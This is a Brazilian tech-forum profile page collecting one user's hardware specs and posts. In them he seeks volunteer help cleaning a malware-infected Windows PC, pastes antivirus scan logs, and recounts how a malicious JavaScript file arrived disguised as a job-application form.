Luiz Fernando Zago

General information

  • City and state
    Itajai/SC
  • Gender
    Male

My PC

  • Processor
    Core I5 2310
  • Cooler
    stock
  • Video card
    GTS 450 Zotac ECO edition (ddr3)
  • Motherboard
    H61M-S2-B3 Gigabyte
  • Memory
    DDR 3 1x 4gb Mirage
  • Hard drives
    samsung hd502hj
  • Power supply
    C3 Tech 500R VE
  • Operating system
    W10
  • Browser
    Firefox
  • Antivirus
    None

My notebook

  • Screen size
    15"
  1. Yeah man, I'm going to create a topic there and go through all the removal steps; it takes longer but at least the PC ends up clean, right, lol. Good thing they offer this assistance to us without charging anything, right, man.. Anyway, thank you very much for the reply, man. I'm around; if anything, add me on Steam: pauladobike lol. Thanks, man. All the best!
  2. Hello, good afternoon everyone. I was infected by a JavaScript file and would like to know whether someone who understands something about Java could analyze the code: [obfuscated JavaScript code] I let my tenant's girlfriend use the PC to "fill out a job application form" because it couldn't be done on her phone, and she downloaded this file, "FORMULARIO 2016 ROSSI.rar", which came with this .js file inside. The wretch told me that my PC's configuration was too old and that it wouldn't even open the thing, lol, so I asked "but why didn't it work?" and she told me it was a PDF, so I came here to download and install Acrobat for her. On her second attempt she said she had managed it, such a liar.. Instead of telling me it hadn't worked, she preferred to lie that it had, because she probably already knew she had done ***** ... Anyway, I would like, if possible, someone to analyze this code and give me some instructions on how to remove this specific malware. Thank you very much in advance,
  3. Hello friend, I just formatted my PC!! I was copying some files to a USB flash drive when suddenly the system froze (my RAM is a generic brand and is old) and I had to restart. It corrupted Windows and I had no alternative but to format; I ended up losing EVERYTHING I had, but it's all right, it could have been worse, heh. I would like to thank you from the heart for the help that was given to me, because I think it's really great, this initiative of yours to want to help the many people who don't understand that much, dedicating your time and knowledge without charging anything! Thank you very much indeed.. I would also like to say that even though I was only at the first steps of the removal, I noticed a significant improvement in the machine's performance, even more than I expected. I apologize for having formatted the machine and for all your "work" (in this case solidarity, for which I am immensely grateful, by the way) having been in vain; I wasn't planning to have to format my PC, not least because I don't even have a Windows CD (I had to borrow one) nor a backup; it was unforeseen and I ended up losing everything I had. Well, that's it. I know it may not make any difference, but I just wanted to say thank you very much and sorry for the mishap I had.. Thank you very much and until next time. May God protect us all, amen!
  4. Hello friend, here is the complete report without any changes:

     McAfee® Labs Stinger™ Version 12.1.0.2076 built on Aug 2 2016 at 12:11:11
     Copyright© 2015, McAfee, Inc. All Rights Reserved.
     AV Engine version v5800.7501 for Windows.
     Virus data file v1000.0 created on Aug 2, 2016
     Ready to scan for 9854 viruses, trojans and variants.
     Custom scan initiated on terça-feira, agosto 02, 2016 21:09:32
     Rootkit scan result : Clean.
     C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\CalendarTool\2.0.0.11380\InstallHelper.exe.vir [MD5:9bc2de6eaed294f66467c14511680fe8] is infected with Artemis!9BC2DE6EAED2
     C:\AdwCleaner\FileQuarantine\C\Program Files (x86)\CalendarTool\2.0.0.11380\InstallHelper.exe.vir has been Deleted
     C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\1911.dll [MD5:45944658e93e052eb631dbb4fd5a3d97] is infected with Artemis!45944658E93E
     C:\Program Files (x86)\Rockstar Games\Grand Theft Auto IV\1911.dll has been Deleted
     C:\Users\Luiz\Videos\inu yasha\cd 2\(8)\movie 3 cd 1+programas e codecs\Codecs\1029139866-VobSub_2.18.exe\28.nsis is infected with Artemis!E3317D444802
     C:\Users\Luiz\Videos\inu yasha\cd 2\(8)\movie 3 cd 1+programas e codecs\Codecs\1029139866-VobSub_2.18.exe\28.nsis has been Deleted
     Summary Report on C: D:
     File(s)
     TotalFiles:............ 424629
     Clean:................. 303028
     Not Scanned:........... 121598
     Possibly Infected:..... 3
     Time: 02:42:22
     Scan completed on terça-feira, agosto 02, 2016 23:51:54

     Sorry for anything.. Thank you..
  5. Log AdwCleaner[C1]
     # AdwCleaner v5.201 - Relatório criado 01/08/2016 às 23:09:25
     LOG JRT
     Junkware Removal Tool (JRT) by Malwarebytes Version: 8.0.7 (07.03.2016)
     Log ZPH
     ~ ZHPCleaner v2016.8.1.94 by Nicolas Coolman (2016/08/01)
  6. ZA-Scan V1.0.0.5 Updated 31-December-2015 Tool run by Luiz on 29/07/2016 at 6:11:11,79. Microsoft Windows 10 Pro 10.0.10586 x64 Running in: Normal Mode
  7. Hello Carlos Turco, thank you very much for wanting to help me!! I reread the instructions and I believe my mistake was that I ran the scan from the Downloads folder instead of the desktop, and perhaps that I had not disabled Windows Defender. Here is the new log as per the instructions. Thank you very much, friend!! ZA-Scan.txt
  8. Good afternoon, gentlemen. I come here to ask for your help removing viruses from my machine. No "strange action" occurs, only slowness and memory usage almost always at 100%. I know the ideal would be a format, since I haven't done one in almost 4 years, but at the moment that is not an option for me because I don't have any drive on hand for backup.. I'm new here, so before creating this topic I read through all the rules, but if something is not in compliance I apologize, since nobody is perfect! I would be immensely grateful if someone could help me with their knowledge. Thank you very much in advance! Here is the ZA-Scan log: ZA-Scan.txt

About Clube do Hardware

On the air since 1996, Clube do Hardware is one of the largest, oldest and most respected technology publications in Brazil.
